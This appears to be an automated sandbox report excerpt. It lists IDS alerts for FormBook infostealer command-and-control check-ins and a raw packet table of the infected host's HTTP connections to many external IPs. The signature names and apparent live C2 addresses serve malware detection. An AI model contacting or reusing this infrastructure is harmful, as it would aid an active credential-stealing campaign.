2024-11-25T09:43:34.856244+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49830 | 212.123.41.108 | 80 | TCP
2024-11-25T09:43:37.476403+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49836 | 212.123.41.108 | 80 | TCP
2024-11-25T09:43:40.197423+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49842 | 212.123.41.108 | 80 | TCP
2024-11-25T09:43:43.245519+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49848 | 212.123.41.108 | 80 | TCP
2024-11-25T09:43:50.075410+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49864 | 172.67.223.206 | 80 | TCP
2024-11-25T09:43:52.764122+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49872 | 172.67.223.206 | 80 | TCP
2024-11-25T09:43:55.400153+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49881 | 172.67.223.206 | 80 | TCP
2024-11-25T09:43:58.058248+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49887 | 172.67.223.206 | 80 | TCP
2024-11-25T09:44:05.306994+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49903 | 172.67.186.192 | 80 | TCP
2024-11-25T09:44:07.720301+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49909 | 172.67.186.192 | 80 | TCP
2024-11-25T09:44:10.340449+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49915 | 172.67.186.192 | 80 | TCP
2024-11-25T09:44:13.151658+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49923 | 172.67.186.192 | 80 | TCP
2024-11-25T09:44:20.346737+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49941 | 161.97.142.144 | 80 | TCP
2024-11-25T09:44:23.073497+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49948 | 161.97.142.144 | 80 | TCP
2024-11-25T09:44:25.814341+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49954 | 161.97.142.144 | 80 | TCP
2024-11-25T09:44:28.762644+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49961 | 161.97.142.144 | 80 | TCP
2024-11-25T09:44:35.744959+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49978 | 43.199.54.158 | 80 | TCP
2024-11-25T09:44:38.416552+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49986 | 43.199.54.158 | 80 | TCP
2024-11-25T09:44:41.088357+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49993 | 43.199.54.158 | 80 | TCP
2024-11-25T09:44:43.815065+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49999 | 43.199.54.158 | 80 | TCP
2024-11-25T09:44:50.674461+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50015 | 209.74.77.108 | 80 | TCP
2024-11-25T09:44:53.340985+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50022 | 209.74.77.108 | 80 | TCP
2024-11-25T09:44:56.024434+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50030 | 209.74.77.108 | 80 | TCP
2024-11-25T09:44:58.679491+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50035 | 209.74.77.108 | 80 | TCP
2024-11-25T09:45:05.816414+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50044 | 185.27.134.206 | 80 | TCP
2024-11-25T09:45:08.524374+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50045 | 185.27.134.206 | 80 | TCP
2024-11-25T09:45:11.241502+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50046 | 185.27.134.206 | 80 | TCP
2024-11-25T09:45:13.852045+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50047 | 185.27.134.206 | 80 | TCP
2024-11-25T09:45:22.341229+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50048 | 163.44.185.183 | 80 | TCP
2024-11-25T09:45:24.967807+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50049 | 163.44.185.183 | 80 | TCP
2024-11-25T09:45:27.713508+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50050 | 163.44.185.183 | 80 | TCP
2024-11-25T09:45:30.299304+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50051 | 163.44.185.183 | 80 | TCP
2024-11-25T09:45:37.664918+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50052 | 217.160.0.200 | 80 | TCP
2024-11-25T09:45:40.365321+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50053 | 217.160.0.200 | 80 | TCP
2024-11-25T09:45:43.090803+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50054 | 217.160.0.200 | 80 | TCP
2024-11-25T09:45:45.806704+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50055 | 217.160.0.200 | 80 | TCP
2024-11-25T09:45:53.457941+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50056 | 107.167.84.42 | 80 | TCP
2024-11-25T09:45:56.166119+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50057 | 107.167.84.42 | 80 | TCP
2024-11-25T09:45:58.766192+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50058 | 107.167.84.42 | 80 | TCP
2024-11-25T09:46:01.480359+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50059 | 107.167.84.42 | 80 | TCP
2024-11-25T09:46:09.371073+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50060 | 77.68.64.45 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                Nov 25, 2024 09:42:53.541223049 CET4974480192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:54.560883045 CET4974580192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:54.680572987 CET8049745185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:54.680717945 CET4974580192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:54.690721989 CET4974580192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:54.810455084 CET8049745185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:56.021442890 CET8049745185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:56.021466017 CET8049745185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:56.021632910 CET4974580192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:56.024231911 CET4974580192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:56.143829107 CET8049745185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:02.048356056 CET4975380192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:02.167898893 CET804975374.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:02.168086052 CET4975380192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:02.232209921 CET4975380192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:02.351942062 CET804975374.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:03.384166956 CET804975374.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:03.384260893 CET804975374.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:03.384313107 CET804975374.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:03.384366989 CET4975380192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:03.384366989 CET4975380192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:03.744431019 CET4975380192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:04.763336897 CET4975980192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:04.882932901 CET804975974.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:04.883044004 CET4975980192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:04.897916079 CET4975980192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:05.017546892 CET804975974.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:06.154476881 CET804975974.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:06.154603958 CET804975974.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:06.154619932 CET804975974.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:06.154690981 CET4975980192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:06.400526047 CET4975980192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:07.419594049 CET4976680192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:07.539330006 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:07.539442062 CET4976680192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:07.554625988 CET4976680192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:07.674612045 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:07.674700975 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:07.674753904 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:07.674806118 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:07.674941063 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:07.675025940 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:07.675127983 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:07.675168037 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:07.675285101 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:08.759027004 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:08.759105921 CET4976680192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:09.073550940 CET4976680192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:09.193070889 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:10.092510939 CET4977680192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:10.212009907 CET804977674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:10.214416027 CET4977680192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:10.226810932 CET4977680192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:10.346309900 CET804977674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:11.526035070 CET804977674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:11.526052952 CET804977674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:11.526070118 CET804977674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:11.526223898 CET4977680192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:11.529161930 CET4977680192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:11.648782015 CET804977674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:17.393229961 CET4979280192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:17.512815952 CET8049792206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:17.512913942 CET4979280192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:17.534715891 CET4979280192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:17.654418945 CET8049792206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:19.041364908 CET4979280192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:19.078130007 CET8049792206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:19.078227043 CET4979280192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:19.078257084 CET8049792206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:19.078349113 CET4979280192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:19.160823107 CET8049792206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:19.160881996 CET4979280192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:20.092895031 CET4979880192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:20.212677002 CET8049798206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:20.212762117 CET4979880192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:20.283946037 CET4979880192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:20.403467894 CET8049798206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:21.791204929 CET4979880192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:21.822235107 CET8049798206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:21.822459936 CET4979880192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:21.822475910 CET8049798206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:21.822832108 CET4979880192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:21.910852909 CET8049798206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:21.912076950 CET4979880192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:22.854609966 CET4980480192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:22.974181890 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:22.974272013 CET4980480192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:23.012981892 CET4980480192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:23.132739067 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:23.132750034 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:23.132760048 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:23.132764101 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:23.132846117 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:23.132854939 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:23.132867098 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:23.132960081 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:23.132968903 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:24.525640965 CET4980480192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:24.539942026 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:24.540035009 CET4980480192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:24.545037985 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:24.545103073 CET4980480192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:24.645121098 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:24.645190001 CET4980480192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:25.646199942 CET4981080192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:25.765700102 CET8049810206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:25.765768051 CET4981080192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:25.871084929 CET4981080192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:25.990614891 CET8049810206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:27.326922894 CET8049810206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:27.327135086 CET8049810206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:27.327255964 CET4981080192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:27.329874992 CET4981080192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:27.449471951 CET8049810206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:33.378108978 CET4983080192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:33.497734070 CET8049830212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:33.497876883 CET4983080192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:33.514730930 CET4983080192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:33.634495020 CET8049830212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:34.856048107 CET8049830212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:34.856173038 CET8049830212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:34.856244087 CET4983080192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:35.028795958 CET4983080192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:36.044747114 CET4983680192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:36.164241076 CET8049836212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:36.164338112 CET4983680192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:36.188087940 CET4983680192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:36.307761908 CET8049836212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:37.476222992 CET8049836212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:37.476294994 CET8049836212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:37.476402998 CET4983680192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:37.698596954 CET4983680192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:44:28.762573004 CET8049961161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:28.762603998 CET8049961161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:28.762634993 CET8049961161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:28.762644053 CET4996180192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:28.762675047 CET4996180192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:28.762695074 CET4996180192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:28.768480062 CET4996180192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:28.888600111 CET8049961161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:34.103215933 CET4997880192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:34.222784042 CET804997843.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:34.222898006 CET4997880192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:34.239140987 CET4997880192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:34.358752012 CET804997843.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:35.744959116 CET4997880192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:35.864783049 CET804997843.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:35.870448112 CET4997880192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:36.764581919 CET4998680192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:36.884249926 CET804998643.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:36.884337902 CET4998680192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:36.903022051 CET4998680192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:37.022639990 CET804998643.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:38.416552067 CET4998680192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:38.460024118 CET804998643.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:38.460078955 CET4998680192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:38.460158110 CET804998643.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:38.460215092 CET4998680192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:38.536060095 CET804998643.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:38.536108971 CET4998680192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:39.435357094 CET4999380192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:39.555087090 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:39.555332899 CET4999380192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:39.572726965 CET4999380192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:39.692635059 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:39.692646027 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:39.692718983 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:39.692738056 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:39.692835093 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:39.692882061 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:39.692938089 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:39.692998886 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:39.693111897 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:41.088356972 CET4999380192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:41.115652084 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:41.115726948 CET4999380192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:41.208204985 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:41.208257914 CET4999380192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:42.131573915 CET4999980192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:42.251137972 CET804999943.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:42.251358986 CET4999980192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:42.262790918 CET4999980192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:42.382293940 CET804999943.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:43.814791918 CET804999943.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:43.814838886 CET804999943.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:43.815064907 CET4999980192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:43.820281982 CET4999980192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:43.941437006 CET804999943.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:49.235855103 CET5001580192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:49.355447054 CET8050015209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:49.355643034 CET5001580192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:49.380299091 CET5001580192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:49.499856949 CET8050015209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:50.674333096 CET8050015209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:50.674415112 CET8050015209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:50.674460888 CET5001580192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:50.885225058 CET5001580192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:51.904280901 CET5002280192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:52.023771048 CET8050022209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:52.023936033 CET5002280192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:52.039508104 CET5002280192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:52.159001112 CET8050022209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:53.337768078 CET8050022209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:53.337846041 CET8050022209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:53.340985060 CET5002280192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:53.545459032 CET5002280192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:54.561028004 CET5003080192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:54.680592060 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:54.680655003 CET5003080192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:54.698921919 CET5003080192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:54.818486929 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:54.818521023 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:54.818608046 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:54.818629026 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:54.818742037 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:54.818753004 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:54.818823099 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:54.818845034 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:54.818948030 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:56.021486998 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:56.021640062 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:56.024434090 CET5003080192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:56.214524984 CET5003080192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:57.233242989 CET5003580192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:57.352737904 CET8050035209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:57.352843046 CET5003580192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:57.363040924 CET5003580192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:57.482481956 CET8050035209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:58.679361105 CET8050035209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:58.679430962 CET8050035209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:58.679491043 CET5003580192.168.2.4209.74.77.108
